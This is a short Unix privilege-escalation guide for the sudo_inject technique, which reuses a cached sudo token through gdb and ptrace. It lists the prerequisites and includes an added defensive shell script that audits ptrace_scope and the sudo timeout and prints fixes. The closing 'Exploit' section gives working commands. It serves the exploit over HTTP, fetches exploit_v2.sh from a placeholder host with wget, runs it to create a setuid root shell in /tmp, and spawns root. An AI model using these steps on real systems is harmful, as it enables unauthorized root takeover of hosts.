Privilege escalation on Unix.
Prerequisites
- You already have a shell as user “sampleuser”
- “sampleuser” has used sudo to execute something in the last 15 minutes (by default that is the lifetime of the sudo token that allows sudo to be used again without entering a password)
- gdb is accessible (or you are able to upload it)
- cat /proc/sys/kernel/yama/ptrace_scope is 0, or you can set it to 0 temporarily:
echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope
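The two host settings listed above (ptrace_scope and the sudo credential cache lifetime) are exactly what a defender should audit and harden. The following POSIX sh script is an added example, not part of the original page or of the sudo_inject project. It reports whether a host is exposed to this token-reuse technique and prints the fix for each finding. The function name audit_sudo_token_reuse and its argument convention are my own; the caller passes the values so the check also runs offline, and read_ptrace_scope is a small helper for reading the live value.

```shell
#!/bin/sh
# Added example (not from the original page): audit the preconditions of sudo
# token reuse via ptrace and print the hardening that closes each one.

# read_ptrace_scope: live value of the Yama sysctl, or "unknown" if unreadable.
read_ptrace_scope() {
    cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo "unknown"
}

# audit_sudo_token_reuse PTRACE_SCOPE TIMESTAMP_TIMEOUT [GDB_PRESENT]
#   PTRACE_SCOPE      value of kernel.yama.ptrace_scope (0-3)
#   TIMESTAMP_TIMEOUT sudo "Defaults timestamp_timeout" in minutes (stock default: 15)
#   GDB_PRESENT       "yes" or "no" (hypothetical flag; optional, informational only)
# Returns 0 when the host is hardened against the technique, 1 when it is exposed.
audit_sudo_token_reuse() {
    scope="$1"; timeout="$2"; gdb_present="${3:-no}"; exposed=0

    case "$scope" in
        0)
            echo "RISK: ptrace_scope=0: any process of a user may attach to another process of the same user."
            echo "  fix: sysctl -w kernel.yama.ptrace_scope=1 and persist it under /etc/sysctl.d/"
            exposed=1 ;;
        1|2|3)
            echo "OK:   ptrace_scope=$scope restricts ptrace attach." ;;
        *)
            echo "WARN: ptrace_scope unreadable ($scope); Yama may be absent, treat as exposed."
            exposed=1 ;;
    esac

    case "$timeout" in
        0)
            echo "OK:   sudo timestamp_timeout=0, a password is required for every sudo call." ;;
        *[!0-9]*|"")
            echo "WARN: timestamp_timeout unreadable ($timeout), treat as exposed."
            exposed=1 ;;
        *)
            echo "RISK: sudo caches credentials for $timeout min; a cached token can be reused by another same-user process."
            echo "  fix: 'Defaults timestamp_timeout=0' in /etc/sudoers via visudo, or run 'sudo -K' after each privileged task"
            exposed=1 ;;
    esac

    if [ "$gdb_present" = "yes" ]; then
        echo "INFO: a debugger (gdb) is available to unprivileged users; remove it from production images where possible."
    fi

    return "$exposed"
}

# Stand-alone run: audit this host with a constructed timeout value of 15 (stock default)
# because parsing sudoers is out of scope for this example; adjust to your sudoers.
if [ "${AUDIT_SELF:-0}" = "1" ]; then
    if command -v gdb >/dev/null 2>&1; then have_gdb=yes; else have_gdb=no; fi
    audit_sudo_token_reuse "$(read_ptrace_scope)" 15 "$have_gdb"
fi
```

Run with AUDIT_SELF=1 sh audit.sh on a host to get the live report; in a configuration test, call audit_sudo_token_reuse with known values and treat a non-zero return as a failed hardening check.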
Exploit
Download the exploit on the attacking machine and serve it over HTTP:
cd /home/kali/share
git clone https://github.com/nongiach/sudo_inject.git
cd sudo_inject
python3 -m http.server 80
The second exploit script (exploit_v2.sh) creates a copy of sh in /tmp that is owned by root and has the setuid bit set:
wget -O /tmp/exploit_v2.sh http://x.x.x.x/exploit_v2.sh
chmod u+x /tmp/exploit_v2.sh
cd /tmp
bash exploit_v2.sh
/tmp/sh -p
whoami # should be root